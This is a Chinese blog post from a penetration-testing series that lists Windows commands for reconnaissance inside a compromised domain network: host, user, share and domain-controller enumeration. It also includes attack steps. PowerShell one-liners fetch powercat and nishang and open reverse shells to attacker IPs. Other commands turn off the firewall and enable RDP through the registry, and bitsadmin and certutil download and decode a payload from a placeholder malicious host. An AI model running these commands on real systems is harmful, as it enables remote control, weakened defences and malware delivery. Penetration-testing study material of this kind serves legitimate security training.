内网渗透:二、内网渗透的信息收集

本文详细列举了Windows系统中用于收集网络配置、服务信息、系统详情、进程列表、计划任务、主机状态、用户权限、端口检查、共享列表、防火墙设置、域信息、域用户信息及安全相关的各类命令。这些命令可用于系统管理和安全审计,包括查看杀软、开启RDP端口以及Windows反弹shell的方法。
摘要由CSDN通过智能技术生成

一、本机信息收集(黑色背景为域成员,蓝色为域控)

1.1 查询网络配置信息

ipconfig /all  (域成员,域控均可执行)

1.2查询本机的服务信息

wmic service list brief  (域成员,域控均可执行)

查询系统信息

systeminfo(域成员,域控均可执行)

查询进程列表

tasklist: 查看服务进程ID

wmic process list brief: 查看安装程序和版本信息

查看计划任务

schtasks /query /fo LIST /v 列出计划任务详细信息

查看主机开机时间

net statistics workstation

用户相关

net user 查看所有用户

net localgroup administrators 获取本地管理员信息

查看端口列表

netstat -ano

查看已打补丁

wmic qfe get Caption,Description,HotFixID,InstalledOn

查看共享列表

net share 查看本机共享列表和可访问的域共享列表

wmic share get name,path,status 查找共享列表

路由表和arp高速缓存表

route print 路由表

arp高速缓存表

arp -a

防火墙 (需要管理员权限)

netsh firewall set opmode disable 关闭防火墙(Windows Server 2003 以前的版本)

netsh advfirewall set allprofiles state off 关闭防火墙(Windows Server 2003 以后的版本)

netsh firewall show config 查看防火墙配置

如果上面的命令被弃用,则使用

netsh advfirewall firewall show rule name=all

根据参考,可以使用这个wmic一键获取本机信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar

域信息收集

权限查看

whoami /all 查看自己的详细权限

net user xxx /domain 查看域内指定用户的权限

判断是否存在域

net time /domain 若出现以下情况则不存在域

若是报错:发生系统错误5,则存在域,但该用户不是域用户

若是以下情况则说明存在域且已经在域中

查看域的名字

net config workstation

探测域内存活主机

1.使用工具 nbtscan http://www.unixwiz.net/tools/nbtscan.html

-V      显示版本信息
-f      显示完整的NBT资源记录响应(推荐)
-H      生成HTTP头
-v      打开更详细的调试
-n      不查找IP地址的反向名称
-p      <n>绑定到UDP端口(默认值=0)
-m      响应中包含MAC地址(由“-f”表示)
-T      <n>将无响应超时<n>秒(默认值为2秒)
-每      次写入后等待<n>毫秒(默认值为10毫秒)
-t      <n>尝试每个地址<n>尝试(默认值=1)
-1      仅使用Winsock 1
-P      以perl hashref格式生成结果 

2.查看arp高速缓存表:arp -a

3.ICMP协议探测(逐个ping) -怕443 -

4.nmap、fscan、arp-scan工具

5.meterpreter会话中执行 run windows/gather/enum_ad_computers

域内基本信息

net group “domain computers” /domain 查询所有域成员计算机列表

域成员

 域控

net view /domain:HACHE 查询域内所有主机(未成功,)

net accounts /domain 获取域密码信息

nltest /domain_trusts 获取域信任信息

nltest /DCLIST:hacke 查看域控制器机器名

Nslookup -type=SRV_ldap._tcp 查看域控制器的主机名

域用户信息收集

net user /domain 向域控制器查询域内用户列表

域成员

 域控

wmic useraccount get /all 获取域内用户详细信息

域成员

 域控

net localgroup administrators 查询本地管理员用户

net group “domain admins” /domain 查询域管理员用户

net group “Enterprise admins” /domain 查询管理员用户组

 

其他

wmic查杀软

杀软路径

WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe

杀软名字

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

Windows 反弹shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666

RDP端口开启与查询

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f:开启

 

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber:查端口

 

cmd下载

bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg

certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt

certutil.exe -decode bad.txt bad.exe

获取盘符

wmic logicaldisk where drivetype=3 get deviceid

常见杀软进程名

https://blog.csdn.net/weixin_39997829/article/details/92666552

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值